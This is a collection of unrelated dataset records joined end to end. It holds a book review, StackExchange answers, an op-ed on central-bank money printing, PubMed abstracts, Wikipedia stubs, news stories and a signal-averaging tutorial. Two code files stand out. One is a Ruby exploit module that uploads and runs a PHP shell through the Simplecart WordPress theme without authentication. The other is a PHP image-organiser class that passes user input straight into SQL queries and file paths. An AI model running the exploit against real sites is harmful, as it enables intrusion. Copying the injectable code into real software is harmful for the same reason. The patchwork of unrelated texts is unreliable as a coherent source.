Main menu
Tag Archives: Assasin
My favorite kind of reading are multiple books, and T. C. Edge has a ten book series that I was excited to get to reading. Book One, The Enhanced, introduces us to a future dystopian earth where genetically modified humans (the Enhanced) live in the upper-crust of society while the rest (Unenhanced) live in the outskirts and are subjugated by the Enhanced.
The series follows a 19 year old orphan named Brie Melrose. She lives in a group home with her best friend, Tess, an over-sized clumsy boy, Drum, her caretaker, Mrs. Carmichael, along with several other kids with varying degrees of attitude. Brie finds herself under the scrutiny of the Sevants (the highest level of the Enhanced) which is exactly where she does not want to be.
Without giving any spoilers I won’t go into any further details about this first book, or the other nine. (If you are desperate to know, you can go to the author’s page and dive in.) I will, however, review this series as a whole, rather than taking each book one at a time.
Overall, I liked this series. T.C. Edge has developed a world that is similar, yet very different from our own. For the most part it is a believable place, and the characters are well developed. The story itself carries the reader through with plenty of action and unexpected twists and turns.
I did find myself skim reading a lot of the later books where the main character (Brie) has extensive internal debates and analysis of the world she lives in and the people she is close to. It became overly repetitive and if it had been condensed, ten good books would have made five fantastic books. I also took note of several misspelled words (this is in British English so I am not referring to those differences) along with grammar issues. A few more beta readers might have caught these. There were a couple of major issues that were not resolved by the end of the series. I may have missed something from skim reading, but because they were big holes I would have expected more than a few words to wrap these things up.
With that said, I do recommend these books. The story is a good one and the world T. C. has built is believable. Of the entire series my two favorite books were the first, The Enhanced, and the tenth, Renegade.
Here is the full list of The Enhanced Series:
The Enhanced
Hybrid
Nameless
Assassin
Avenger
Defender
Captive
Invader
Renegade
**One final advisory word to the youngest readers; these books do have intense battle scenes which may not be suited for the more sensitive reader.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
Multipolygon in DSE Graphs
I need to store Multipolygon data in Datastax Graph. They do support some of geo data types like point, line String and polygon . Do they support Multipolygon.
Could you please help with this
A:
DSE Graph does not support explicit Multipolygon data types.
If you don't mind sharing, what types of issues/challenges does Multipolygon help you solve?
|
{
"pile_set_name": "StackExchange"
}
|
Q:
How does GNU Radio File Sink work?
I want to know how the file sink in GNU Radio works. Does it receive a signal and then write it to the file, and while it's being written signal receiving is not done?
I just want to make sure if some portion of the signal is lost without being written to the file because of the time taken for writing.
Any help or reading material regarding this would be very much appreciated.
A:
Depending the sampling rate of the device, writing samples to file without discontinuities may be impossible.
Instead writing to disk, you can write the samples in a ramdisk. Ramdisk is an abstraction of file storage, using the RAM memory as storage medium. The great advantage of the ramdisk is the very fast read/write data transfers. However, the file size is limited somehow by the amount of RAM memory that the host has.
Here is a good article that will help you to create a ramdisk under Linux. I am sure that you will easily find a guide for Windows too.
|
{
"pile_set_name": "StackExchange"
}
|
The US Fed is printing money to get the US out of a recession. The ECB is also printing money, with the same target in mind. In limited amounts, this is a good idea, but the central banks are going about it the wrong way: they are essentially printing money for banks and politicians. They should print money for populations and in order to do this, they have to set up individual accounts for the whole population.
So far, the central bankers have pumped money through the existing systems to friends in high places, bankers and politicians. They have so far been loathe to create new systems to print money for the people who actually have debilitating debts: individuals and their private companies.
Let’s unpack this and talk about how additional money is currently channeled towards ‘friends’ and what needs to happen to get money in the hands of those who would do useful things with it.
Follow up:
The US Fed first started printing money in 2008 by directly rewarding banks for having reserves, ie it just gave a quarter of one percent on all reserves. Then it dropped the cost of loans to banks: the ‘discount rate’ it charges to commercial banks is now a paltry 0.75%. So a bank can lend at 0.75%, also implying that bank-related major institutions can borrow indirectly at such low costs. What does a bank do with this cheap money, apart from giving its bosses a huge bonus of course? A particularly safe thing is to buy up government bonds, which the Fed counts as ‘safe’ and as a ‘reserve’. And what are the returns on the Federal bonds? Well, at the moment they are 1.88% for 10-year bonds, but they were roughly 4% in 2008 when the Fed started this game. So a direct and fairly safe profit is to be made by borrowing from the Fed at 0.75% and then lending it out again to the Fed (via the government) for 2-4%. Of course, investing abroad is even more lucrative. So, the roughly 2 trillion more money that the Fed has put into the US economy has partially ended up as 1.6 trillion in additional, idle, reserves in US banks (see here) who in turn have a fair whack of Treasury bonds directly or indirectly, and have of course also tried to park their money in lucrative foreign investments.
The Fed has also announced it will just directly buy up mortgage backed securities for more than its real worth, again sending money to banks, and more to banks that previously made worse investment decisions. Similarly, the Fed now and then buys entire vintages of new government bonds.
In short, the Fed has printed money for bankers and governments, subsidizing government consumption, bankers’ bonuses, and crowding out commercial investment since the smart money will have been invested abroad to flee the dropping US dollar and get the higher foreign returns.
The ECB has similarly been printing money for bankers and governments, albeit somewhat indirect. It for instance doesnt like to directly buy bonds so instead gives loans to commercial banks at very low rates (such as 0.5%), who in turn give them those bonds as collateral. By borrowing from those self-same banks the same money at higher interest rates (say 3%), the ECB gives these banks a guaranteed income-stream that ensures the viability of the incredible bonuses the bankers award themselves. Somewhat deviously, the ECB does not disclose the prices on these buddy-buddy deals so the full extent to which money is given to befriended bankers is not clear! How convenient for them. And when the ECB is not ‘lending’ from commercial banks, they can always buy up government bonds at much higher returns than banks pay to borrow off the ECB.
Also, the ECB now directly buys up bonds, some 200 billion euros worth at the moment according to one source. The large combined holding of bonds mean it has now become a cheap financier of government consumption. And of course banks are just as loathe to lend to private investors as before, prefering instead to get into safe government bonds. When push comes to shove, as happened with Greece a while back, the ECB allows countries to simply not pay back the loans, or, equivalently, extend the loans till the far far future whilst giving back any interest rate up to that moment (zero-interest loans hypothetically paid back in the far future).
So the situation in Europe too is that the ECB is subsidizing government consumption and bankers bonuses.
It is crucial to realise that this method of money printing is not the economic ideal nor really necessary: it is just convenient and helps the direct friends of the central bankers. I know this sounds somewhat conspiratorial, but dont forget that central bankers come from and often return to the world of bankers and governments, so favours they do to that in-crowd come with personal returns to central bankers! ‘Mates helping mates’, we would say in Australia.
What is the alternative? To do money printing properly, ie to have what is known as ‘helicopter drops’ wherein every member of the population is given the same amount of new money to spend as they see fit. In stead of printing money for bankers and governments, one would give new money to the population. It then wouldn’t end up in bonuses but in things households care about: the education of their kids, holidays, cars, medicines, their own private business, paying back their stifling mortgage debts and their commercial loans, etc. Now, which method of money printing sounds more likely to help the economy and get rid of the shackles of bad debts: the hoarding of idle reserves in banks and inflated government consumption, or private investment and private consumption? The latter, of course, particularly since the most crippling debts are private.
Why hasn’t this happened yet? I suspect the main reason is that central bankers are members of the financial elite with an unhealthy disdain for the population, thus allowing themselves to think that giving money to their friends and future employers is ‘better for the economy’ than giving it to the ‘plebs’.
But there is also a convenient excuse, which is that we don’t have the institutions to do it. There is no mechanism to send, say, 10,000 Euro to every member of the Eurozone. Why not? Because no-one has a list of all the individuals living in the Eurozone. Neither do all those individuals have bank accounts. They aren’t even all registered by their own governments.
How come? The deep historical reason is that Napoleon did not conquer the whole of Europe and that there are hence outposts (like the UK!) that do not have a population register to start from. Many people don’t have passports, nor are their deaths properly recorded. More immediately, even in those countries with population registers, not everyone has a bank account because they are too young, too disabled, too old, etc.
So the easy excuse of the central bankers is that they simply have no mechanism to print ‘money for the people’ and hence are forced by circumstance to give it to their mates. But of course this really is just a form of laziness that masks elitism, for there is really no reason why the central banks could not set up a universal bank for everyone. It should create that public institution, just as it is the role in general for government to set up beneficial public goods!
So one practical way to go is to announce that everyone over 16 with a passport of a Eurozone country can register themselves for a bank account with the ECB, at which point their fingerprints and perhaps a photo of the eye is taken too to ensure minimal cheating. Upon receiving their ECB account they get 10,000 Euros in that account. The ECB can of course just out-source this job if it wants to. Ditto for the US Fed. What then would happen is that everyone first goes through their national system to get a valid passport and only then applies to the local ECB-registering office.
It would clearly be a massive operation to register the entire population with several pit-falls (just imagine the incentives to pretend a family member hasn’t yet died!), but that registry itself has all kinds of further useful purposes as it can become the main conduit for European and American taxation and subsidies. It is the kind of system we should want to have anyway, if only to get more efficient internet banking! And yes, public goods of this type are still being built in the modern world, but lately more by private companies than public ones. Just think of Google StreetView.
The simple message: if central banks think printing money is the way out of the debt crisis, they should print money for their people rather than just their befriended bankers and politicians!
Make
a Comment
Econintersect wants your comments,
data and opinion on the articles posted. As the internet is a
"war zone" of trolls, hackers and spammers - Econintersect must balance its
defences against ease of commenting. We have joined with Livefyre
to manage our comment streams.
To comment, just click the "Sign In" button at the top-left corner of
the comment box below. You can create a commenting account using your
favorite social network such as Twitter, Facebook, Google+, LinkedIn or
Open ID - or open a Livefyre account using your email address.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
Different aggregate operations on different columns pyspark
I am trying to apply different aggregation functions to different columns in a pyspark dataframe. Following some suggestions on stackoverflow, I tried this:
the_columns = ["product1","product2"]
the_columns2 = ["customer1","customer2"]
exprs = [mean(col(d)) for d in the_columns1, count(col(c)) for c in the_columns2]
followed by
df.groupby(*group).agg(*exprs)
where "group" is a column not present in either the_columns or the_columns2. This does not work. How to do different aggregation functions on different columns?
A:
You are very close already, instead of put the expressions in a list, add them so you have a flat list of expressions:
exprs = [mean(col(d)) for d in the_columns1] + [count(col(c)) for c in the_columns2]
Here is a demo:
import pyspark.sql.functions as F
df.show()
+---+---+---+---+
| a| b| c| d|
+---+---+---+---+
| 1| 1| 2| 1|
| 1| 2| 2| 2|
| 2| 3| 3| 3|
| 2| 4| 3| 4|
+---+---+---+---+
cols = ['b']
cols2 = ['c', 'd']
exprs = [F.mean(F.col(x)) for x in cols] + [F.count(F.col(x)) for x in cols2]
df.groupBy('a').agg(*exprs).show()
+---+------+--------+--------+
| a|avg(b)|count(c)|count(d)|
+---+------+--------+--------+
| 1| 1.5| 2| 2|
| 2| 3.5| 2| 2|
+---+------+--------+--------+
|
{
"pile_set_name": "StackExchange"
}
|
More tetanic contractions are required for activating glucose transport maximally in trained muscle.
Exercise training increases contraction-stimulated maximal glucose transport and muscle glycogen level in skeletal muscle. However, there is a possibility that more muscle contractions are required to maximally activate glucose transport in trained than in untrained muscle, because increased glycogen level after training may inhibit glucose transport. Therefore, the purpose of this study was to investigate the relationship between the increase in glucose transport and the number of tetanic contractions in trained and untrained muscle. Male rats swam 2 h/day for 15 days. In untrained epitrochlearis muscle, resting glycogen was 26.6 micromol glucose/g muscle. Ten, 10-s-long tetani at a rate of 1 contraction/min decreased glycogen level to 15.4 micromol glucose/g muscle and maximally increased 2-deoxy-D-glucose (2-DG) transport. Training increased contraction-stimulated maximal 2-DG transport (+71%; P < 0.01), GLUT-4 protein content (+78%; P < 0.01), and resting glycogen level (to 39.3 micromol glucose/g muscle; P < 0.01) on the next day after the training ended, although this training effect might be due, at least in part, to last bout of exercise. In trained muscle, 20 tetani were necessary to maximally activate glucose transport. Twenty tetani decreased muscle glycogen to a lower level than 10 tetani (18.9 vs. 24.0 micromol glucose/g muscle; P < 0.01). Contraction-stimulated 2-DG transport was negatively correlated with postcontraction muscle glycogen level in trained (r = -0.60; P < 0.01) and untrained muscle (r = -0.57; P < 0.01).
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Effects of sulfate on the acute toxicity of selenate to freshwater organisms.
This study evaluated the relationship between ambient sulfate concentrations and acute selenate toxicity to freshwater aquatic life. Previous studies indicated that increasing sulfate concentrations reduced selenate bioconcentration and toxicity. However, these studies generally were not conducted in a manner that was conducive to their use in deriving a water quality criterion. We compiled results from previous studies and generated additional data to help define a selenate-sulfate relationship for acute toxicity. Selenate toxicity was determined in standardized test waters with varying sulfate concentrations using Ceriodaphnia dubia, Gammarus pseudolimnaeus, Hyalella azteca, and Pimephales promelas as the test organisms. Analysis of test results indicated that a significant relationship does exist between acute selenate toxicity and ambient sulfate concentrations. Data from these tests and previous studies were combined to develop a statistical relationship sufficiently robust to derive a sulfate-dependent water quality criterion for selenate. The relationship is similar to those commonly derived between divalent metals and hardness to adjust water quality criteria.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Maghama (department)
Maghama is a department of Gorgol Region in Mauritania.
List of municipalities in the department
The Maghama department is made up of following municipalities:
Beilouguet Litame
Daw
Dolol Civé
Maghama
Sangué
Toulel
Vréa Litama
Wali Djantang.
In 2000, the entire population of the Maghama Department has a total of 45 501 inhabitants (21 999 men and 23 502 women).
References
Category:Departments of Mauritania
|
{
"pile_set_name": "Wikipedia (en)"
}
|
These are not reasons why the CIA redacted portions of the Senate's so-called torture report: to cover up "violations of law," to hide "inefficiency," or to "prevent embarrassment."
So says a CIA lawyer in court papers explaining why some redacted portions of the 499-page executive summary, released by the Senate Intelligence Committee last December, can never be revealed. The information includes the identifies of covert CIA officers, "code words" used to conceal the identities of countries, "pseudonyms," "official titles," the number of people employed by the CIA, and the salaries of people who work for the CIA. The public disclosure of this information, the CIA said, would "damage national security."
Therefore, it all "needs to remain top secret," CIA lawyer Martha Lutz said in a January 21 declaration. Lutz was responding to a Freedom of Information Act (FOIA) lawsuit I filed against the agency a year ago in which I sought a copy of the Intelligence Committee's executive summary. Now that the committee has released the document, VICE News is arguing that the CIA should further unredact it.
The Senate committee's executive summary, part of a still-classified 6,900-page report and prepared by the panel's then-Democratic majority, concluded that the CIA did not obtain any valuable or unique intelligence from detainees it held captive and subjected to techniques such as waterboarding at CIA black site prisons. The CIA and Senate Republicans have vehemently disputed the Senate Intelligence Committee's conclusions.
Release of the executive summary was delayed for months due to the fact that the agency and Intelligence Committee chairwoman Dianne Feinstein butted heads over the extent of redactions the CIA insisted upon in the executive summary. Feinstein and other Democratic lawmakers on the committee wanted to include pseudonyms of officers and other agency officials who played a role in the detention and interrogation program. But the CIA and the White House would not permit it, arguing that the officers' lives would be endangered by journalists and human rights researchers who would likely quickly identify them.
Meanwhile, the war between Democrats on the committee and the CIA continues and shows no signs of abating.
"Given the sensitivity of the detention and interrogation program, there is a significant concern that the release of any information that would allow for the identification of these individuals could place these persons and those associated with them in danger," Lutz said in her declaration. "In fact, following the public release of the Executive Summary, there has been widespread speculation regarding the individuals mentioned in the Executive Summary and attempts to identify those persons. Disclosure of the pseudonyms when connected with other details contained in the Executive Summary could lead to positive identification of those individuals. In order for the agency to effectively carry out its foreign intelligence gathering mission, it is imperative that the identities of covert personnel be protected."
'Disclosing intelligence expenditures would show the level of funding devoted to certain activities, which in turn would reveal the resources available to the Intelligence Community and the intelligence priorities of the US Government.'
According to Lutz, 7 percent of the executive summary was blacked out. She said the "vast majority of redactions concern CIA equities," but she noted that Department of State, the National Security Agency, the Department of Defense and FBI requested "limited redactions."
The redactions fall under a number of FOIA exemptions that the government uses to protect national security.
"Disclosure would harm national security because it would reveal certain capabilities, activities, and intelligence that would make it difficult to further obtain intelligence," Lutz said. "Intelligence sources must be certain that the US Government will do everything in its power to ward against the public disclosure of the intelligence shared and how that information was acquired."
Lutz said "seemingly innocuous details" such as dates or how much money the CIA spent "on a particular program" can't be released because they "could reveal broader intelligence priorities and the source and methods of certain intelligence collection when juxtaposed with other publicly available data."
"Disclosing intelligence expenditures would show the level of funding devoted to certain activities, which in turn would reveal the resources available to the Intelligence Community and the intelligence priorities of the US Government," Lutz said.
In other words, the public could use information about the costs associated with, for example, rectal feeding — if the CIA were compelled to disclose it — to build a mosaic and figure out additional details about the torture program that the CIA says has to remain secret.
The CIA also redacted "discrete pieces of foreign government and liaison information" from the executive summary.
"These details would indicate the identity of intelligence sources and the specific information shared," Lutz said. "Disclosing the fact of the relationship, the nature of the assistance, or the information provided — which is reflected in these redactions — would suggest to other foreign liaison service and foreign government officials that the US Government is unable or unwilling to observe an express agreement of absolute secrecy."
The CIA also redacted the geographic locations of its "covert CIA installations" and black sites. This information is deemed to be an "intelligence method" because it would reveal the purpose of it the installations and sites, even though it's widely known that the CIA operated secret prisons in Thailand, Lithuania, Poland, and other countries, and that detainees were tortured there.
But "official acknowledgement of the installation could cause the host country to take countermeasures, on its own, or in response to pubic pressure to eliminate the CIA within its borders," Lutz said. "And any information released about the installation could lead terrorists to attack it."
Lutz said if the federal judge presiding over the FOIA case is not convinced by the CIA's representations, she would file a declaration to the court, under seal, and provide more information about the intelligence at issue.
Steven Aftergood, the director of the Project on Government Secrecy at the Federation of American Scientists, told VICE News that Lutz's declaration is a fairly straightforward presentation on CIA's classification principles.
"What is uncertain, however, is whether and how these general principles apply to the specific redactions in the [Senate Intelligence Committee's executive summary], and whether the redactions are therefore justified," he said. "That's hard to answer from the outside. But the judge could attempt to do so" if he takes Lutz up on her offer and asks her to submit a declaration under seal.
Aftergood also noted that Lutz's claims that "none of the information was classified in order to conceal violations of law or to prevent embarrassment needs to be carefully parsed."
"The redaction information may indeed conceal violations of law or embarrassing material," he said. "But what CIA is saying here is that it was not classified 'in order to' conceal such information. In other words, this is a claim about the classifier's mental state and his or her intent, not about the information that is being withheld. As such, it is all but impossible to challenge — since who can prove or disprove what the classifier intended to accomplish?"
A final decision in the FOIA case is expected later this year.
|
{
"pile_set_name": "OpenWebText2"
}
|
The German government introduced a controversial road toll on Thursday which will force foreign car drivers to pay up to €130 a year for using Germany’s Autobahn motorways.
The plan, intended to help Germany fund the upkeep of its transport infrastructure which is used by millions of foreign vehicles, may yet face a legal challenge in Brussels for discriminating against foreign motorists.
After months of heated debate between Chancellor Angela Merkel’s Christian Democrats (CDU) and their Bavarian sister party Christian Social Union (CSU), Transport Minister Alexander Dobrindt dropped an original idea to raise the fee on all roads.
However, the minister stuck to the plan that the toll will not lead to extra costs for German drivers by allowing them to offset the levy against an already existing motor vehicle tax.
Dobrindt, a leading member of the CSU, said he was convinced that his draft law does not discriminate against foreign motorists and therefore would stand if challenged in court.
“The infrastructure fee is sensible, fair and just,” the minister said, adding that the revenues of the toll would only be used to modernise Germany’s motorways and main roads.
The toll is expected to be introduced in 2016. Motorists have to pay it by registering their license plates via the internet. Foreigners can also pay the levy at gas stations.
The fee will take into account the cylinder capacity and environmental compatibility of the car with a maximum toll of €130 a year. Foreign drivers can pay a 10-day levy for €10 or two month for €22.
The minister expects revenues of €3.7 billion of which around €3 billion will come from domestic drivers. With estimated introduction costs of nearly €200 million, the net revenue might shrink to just €500 million a year.
Dobrindt’s CSU wants foreign motorists to pay tolls on motorways because they think it is unfair that foreigners travel for free in Germany while German drivers have to pay tolls in neighbouring countries like Austria, Switzerland and France.
The CSU pressed the motorway toll issue in coalition talks after last year’s German federal elections.
But Merkel’s CDU and its other coalition ally, the centre-left Social Democrats (SPD), said they would only back the toll if it did not lead to extra costs for German motorists and if it complied with European Union rules that prohibit discrimination against foreign motorists.
Germany has already introduced a satellite-based toll system for lorries that obliges truck drivers to pay on motorways. This toll depends on the number of kilometres actually driven.
- Reuters
|
{
"pile_set_name": "OpenWebText2"
}
|
{#sp1 .92}
|
{
"pile_set_name": "PubMed Central"
}
|
Koarnjum
Koarnjum is a village in the municipality of Leeuwarden (Friesland province), in the Netherlands. The village is situated between Jelsum and Britsum and a population of around 370 in January 2017.
History
Cornjum was served by a station on the North Friesland Railway which opened in 1901 and closed to passengers in July 1936, before reopening to passengers in May 1940 and closing to passengers again in December 1940. The line finally closed in 1997.
Before 2018, the village was part of the Leeuwarderadeel municipality.
Notable Landmarks
The old mansion Martenastate in Cornjum was demolished around 1900 and replaced by a small fantasy castle.
References
External links
Category:Leeuwarden
Category:Populated places in Friesland
|
{
"pile_set_name": "Wikipedia (en)"
}
|
<?php
class Images {
function load($data){
$db = new SQLiteDatabase("sql/imgorg.db");
$tags = $data->tags;
$album = $data->album;
$qry = 'select i.filename as filename, i.url as url, i.id as id from Images i';
$where = array();
if ($tags) {
for ($i = 0;$i < sizeof($tags);$i++) {
$qry .= ' INNER JOIN Images_Tags it'.$i.' ON i.id = it'.$i.'.image_id';
array_push($where,' it'.$i.'.tag_id = "'.$tags[$i].'"');
}
}
if ($album) {
$qry .= ' INNER JOIN Albums a ON i.album_id = a.id';
array_push($where, ' a.id ="'.$album.'"');
}
if ($where) {
$qry .= ' WHERE'.join(" AND", $where);
}
$res = $db->query($qry);
return $res->fetchAll();
// return $qry;
}
function upload($data, $files){
$name = $files["Filedata"]["name"];
$db = new SQLiteDatabase("sql/imgorg.db");
$db->queryExec('INSERT INTO Images (filename, url) VALUES("'.$name.'","images/'.$name.'")');
$q = $db->query('SELECT * FROM Images WHERE filename = "'.$name.'"');
move_uploaded_file($files["Filedata"]["tmp_name"],"../images/".$name);
return array(
'data' => $files["Filedata"],
'res' => $q->fetchObject()
//,
//'test' => $phm->getImageQuality()
);
}
function addToAlbum($data) {
$images = $data->images;
$album = $data->album;
$db = new SQLiteDatabase("sql/imgorg.db");
for ($i = 0;$i < sizeof($images);$i++) {
// $db->queryExec('INSERT INTO Albums_Images (image_id, album_id) VALUES ("'.$images[$i].'","'.$album.'")');
$db->queryExec('UPDATE Images SET album_id = "'.$album.'" WHERE id ="'.$images[$i].'"');
}
return array('success' => true, 'images' => $images, 'album' => $album);
}
function tagImage($data) {
$images = $data->images;
$tag = $data->tag;
$db = new SQLiteDatabase("sql/imgorg.db");
// if it is a known tag the id is sent, otherwise a new string is, so we need to insert
if (!is_numeric($tag)) {
$db->queryExec('INSERT INTO Tags (text) VALUES ("'.$tag.'")');
$q = $db->query('SELECT id FROM Tags WHERE text = "'.$tag.'"');
$tag = $q->fetchObject()->id;
}
for ($i = 0;$i < sizeof($images);$i++) {
$db->queryExec('INSERT INTO Images_Tags (image_id, tag_id) VALUES ("'.$images[$i].'","'.$tag.'")');
}
return array('success' => true, 'images' => $images, 'tag' => $tag);
}
function rename($data) {
$db = new SQLiteDatabase("sql/imgorg.db");
$image = $data->image;
$name = $data->name;
$url = $data->url;
$urls = split('/',$url);
array_pop($urls);
$newUrl = (join('/',$urls)).'/'.$name;
$db->queryExec('UPDATE Images SET url = "'.$newUrl.'", filename = "'.$name.'" WHERE id = "'.$image.'"');
rename('../'.$url, '../'.$newUrl);
return array('image' => $image, 'name' => $name, 'url' => $newUrl);
}
function remove($data) {
$db = new SQLiteDatabase("sql/imgorg.db");
$images = $data->images;
for ($i = 0;$i < sizeof($images);$i++) {
$res = $db->query('SELECT url FROM Images where id ="'.$images[$i].'"');
$url = $res->fetchObject()->url;
unlink('../'.$url);
$db->queryExec('DELETE FROM Images WHERE id ="'.$images[$i].'"');
$db->queryExec('DELETE FROM Images_Tags WHERE image_id ="'.$images[$i].'"');
}
}
function getInfo($data) {
$db = new SQLiteDatabase("sql/imgorg.db");
$image = $data->image;
$q = $db->query('SELECT url FROM Images WHERE id = "'.$image.'"');
$path = $q->fetchObject()->url;
$ret = exif_read_data('../'.$path);
return $ret;
}
}
|
{
"pile_set_name": "Github"
}
|
In the latest sign of the disconnect between the legal system and an increasingly sexualized adolescent cyberculture, two 13-year-old Pennsylvania girls are threatened with child pornography charges for sending seminude photos of themselves via cellphone to their friends.
A third girl, 16, who sent a picture of herself wrapped in a towel at her waist after a shower, may also face charges.
“Sexting” or “sexing,” the practice of sending nude or seminude pictures via cellphone or posting them online, is on the rise. A recent study by the National Campaign to Prevent Teen Pregnancy found that one in five teenagers admitting to having posted or sent a nude or seminude picture of themselves. In another survey by wiredsafety.org, an Internet safety and educational nonprofit organization, 44 percent of teen boys said they have seen at least one naked picture of a female classmate.
Over the past year, as schools and parents in states from Ohio and New Jersey to Colorado and California have found out about the practice, prosecutors have also become involved, in some cases threatening felony charges against the teenagers.
The incidents have sparked a nascent national campaign to educate parents and change the laws.
“The laws are either too hot or too cold and we need to make sure we find one that is just right,” says Perry Aftab, an online safety and privacy expert who founded wiredsafety.org. “We are either charging kids under child pornography and sexual exploitation laws as if they were registered sex offenders – which they will be if they’re successfully prosecuted – or we’re giving them a slap on the wrist with harassment laws that were not intended to address this.”
The situation in Tunkhannock, Pa., illustrates the extent to which “sexting” has become part of adolescent culture and the dilemma that it presents to parents, teachers, and law enforcement officials.
Last October, officials at the Tunkhannock Area High School, which is in a rural community north of Scranton, confiscated several cellphones from students and discovered pictures of scantily clad or seminude female students on them. Parents were alerted, and so were the police. In November, the local district attorney sent a letter to parents stating they’d discovered a “disturbing trend” and that they were investigating “several juveniles for possessing nude or seminude photos of young girls.” The letter went on to warn parents of the legal consequences as well as the fact that the teens appeared to be unaware of them.
“One young lady, when questioned about her photo being on a cell phone, called this ‘flirting’,” the letter stated.
With an estimated 20 teens involved, district attorney George Skumanick decided to try what he calls “a progressive” approach to the problem. In February, he sent another letter to the teens’ parents saying that if the students agreed to be placed on probation, submit to random drug testing and take part in a five-week counseling program, he would not press felony charges.
“It was mainly a crime of foolishness and naiveté, so we developed a program,” says Mr. Skumanick.
Most of the students agreed to take the classes. But the parents of three of the students felt the district attorney had gone too far in threatening felony charges. They went to the American Civil Liberties Union (ACLU), which brought suit against the district attorney charging that he was “standing child pornography laws on their heads.”
Sending seminude pictures is “stupid, careless, naive, poor judgment – all of the things that teenagers are and it could have really bad consequences for the future. But is it criminal and is it child pornography?” asks Witold Walczak, legal director of the ACLU in Pennsylvania. “These photos are not child pornography by production or by content – the Supreme Court has repeatedly said the definition of pornography is much narrower than just nudity.”
The district attorney’s decision to threaten child pornography charges against kids wearing underwear or in a bathing suit, Mr. Walczak says, is “a complete abuse his authority.”
District attorney Skumanick disagrees. “We tried to do what we thought was the progressive and the right thing by not charging them – by giving them the ability to avoid any record whatsoever,” he says.
The ACLU’s stance on the issue, Skumanick contends, would make it possible for anyone to bypass state laws and go directly to federal court charging their civil rights were violated before they were even charged with a crime. “That could cripple the criminal justice system,” he argues.
A judge is currently reviewing the ACLU’s request for a temporary restraining order against the district attorney. A ruling is expected this week.
For cyber-safety and teen advocates trying to raise awareness of the issue, the complexities of the Tunkhannock case simply reinforce the need to educate parents about the extent of “sexting” and students about the potentially severe consequences of the practice.
“Parents do not realize how widespread sexing is or how quickly the number of cases are rising,” says Casi L., an 11th grader at Ursuline School in New Rochelle, N.Y., who’s been working on cyber-safety issues since the 8th grade.
“A lot of kids feel anonymous online so they feel more comfortable doing inappropriate things because they think they won’t be linked back to them.”
The survey by the National Campaign to Prevent Teen Pregnancy also found that one in three young adults aged 20 to 26 had also sent nude or seminude pictures by phone or posted them online. Bill Albert, a spokesman for the National Campaign, says he believes those numbers are low because they were self-reported.
“We specifically put this question so that it was not open to interpretation,” says Mr. Albert. “Nude is nude, and seminude is seminude. If a person is in their bra, we wouldn’t classify that as seminude – if one of the 13-year-olds involved in this [Pennsylvania] case took our survey she’d check ‘no’ and appropriately so.”
The survey also found that young people have mixed feelings about the practice. The vast majority – 66 percent of teen girls and 60 percent of teen boys – say they thought of sexting as “fun or flirtatious,” but more than 70 percent also recognized it could have serious, long-term consequences in terms of their careers or social standing.
“But legal consequences were very low on their list of concerns,” says Albert.
|
{
"pile_set_name": "OpenWebText2"
}
|
# frozen_string_literal: true
require 'socket'
class Wpxf::Exploit::SimplecartShellUpload < Wpxf::Module
include Wpxf
def initialize
super
update_info(
name: 'Simplecart Theme Shell Upload',
desc: 'This module exploits a file upload vulnerability in all versions '\
'of the Simplecart theme found in the upload_file.php script '\
'which contains no session or file validation. It allows '\
'unauthenticated users to upload files of any type and '\
'subsequently execute PHP scripts in the context of the '\
'web server.',
author: [
'Divya', # Vulnerability disclosure
'rastating' # WPXF module
],
references: [
['EDB', '36611']
],
date: 'April 02 2015'
)
end
def check
check_theme_version_from_readme('simplecart')
end
def plugin_url
normalize_uri(wordpress_url_themes, 'simplecart')
end
def uploads_url
normalize_uri(plugin_url, 'admin',)
end
def uploader_url
normalize_uri(uploads_url, 'upload-file.php')
end
def payload_body_builder(payload_name)
target_ip = IPSocket.getaddress(target_host)
field_name = Utility::Text.md5(target_ip)
builder = Utility::BodyBuilder.new
builder.add_file_from_string(field_name, payload.encoded, payload_name)
builder.add_field('upload_path', 'Lg==')
builder
end
def run
return false unless super
emit_info 'Preparing payload...'
payload_name = "#{Utility::Text.rand_alpha(10, :lower)}.php"
builder = payload_body_builder(payload_name)
emit_info 'Uploading payload...'
res = nil
builder.create do |body|
res = execute_post_request(url: uploader_url, body: body)
end
if res.nil?
emit_error 'No response from the target'
return false
end
if res.code != 200
emit_error "Server responded with code #{res.code}"
return false
end
payload_url = normalize_uri(uploads_url, payload_name)
emit_success "Uploaded the payload to #{payload_url}", true
emit_info 'Executing the payload...'
res = execute_get_request(url: payload_url)
if res && res.code == 200 && !res.body.strip.empty?
emit_success "Result: #{res.body}"
end
return true
end
end
|
{
"pile_set_name": "Github"
}
|
Signal averaging
Signal averaging is a signal processing technique applied in the time domain, intended to increase the strength of a signal relative to noise that is obscuring it. By averaging a set of replicate measurements, the signal-to-noise ratio (SNR) will be increased, ideally in proportion to the number of measurements.
Deriving the SNR for averaged signals
Assumed that
Signal is uncorrelated to noise, and noise is uncorrelated : .
Signal power is constant in the replicate measurements.
Noise is random, with a mean of zero and constant variance in the replicate measurements: and .
We (canonically) define Signal-to-Noise ratio as .
Noise power for sampled signals
Assuming we sample the noise, we get a per-sample variance of
.
Averaging a random variable leads to the following variance:
.
Since noise variance is constant :
,
demonstrating that averaging realizations of the same, uncorrelated noise reduces noise power by a factor of .
Signal power for sampled signals
Considering vectors of signal samples of length :
,
the power of such a vector simply is
.
Again, averaging the vectors , yields the following averaged vector
.
In the case where , we see that reaches a maximum of
.
In this case, the ratio of signal to noise also reaches a maximum,
.
This is the oversampling case, where the observed signal is correlated (because oversampling implies that the signal observations are strongly correlated).
Time-Locked Signals
Averaging is applied to enhance a time-locked signal component in noisy measurements; time-locking implies that the signal is observation-periodic, so we end up in the maximum case above.
Averaging Odd and Even Trials
A specific way of obtaining replicates is to average all the odd and even trials in separate buffers. This has the advantage of allowing for comparison of even and odd results from interleaved trials. An average of odd and even averages generates the completed averaged result, while the difference between the odd and even averages constitutes an estimate of the noise.
Algorithmic Implementation
The following is a MATLAB simulation of the averaging process:
% create [sz x sz] matrix
% fill the matrix with noise
sz=256;
NOISE_TRIALS=randn(sz);
% create signal with a sine wave
% divide the array SZ by sz/2
SZ=1:sz;
SZ=SZ/(sz/2);
S=sin(2*pi*SZ);
for i=1:sz;
NOISE_TRIALS(i,:) = NOISE_TRIALS(i,:) + S;
end;
% create the average
average=sum(NOISE_TRIALS)/sz;
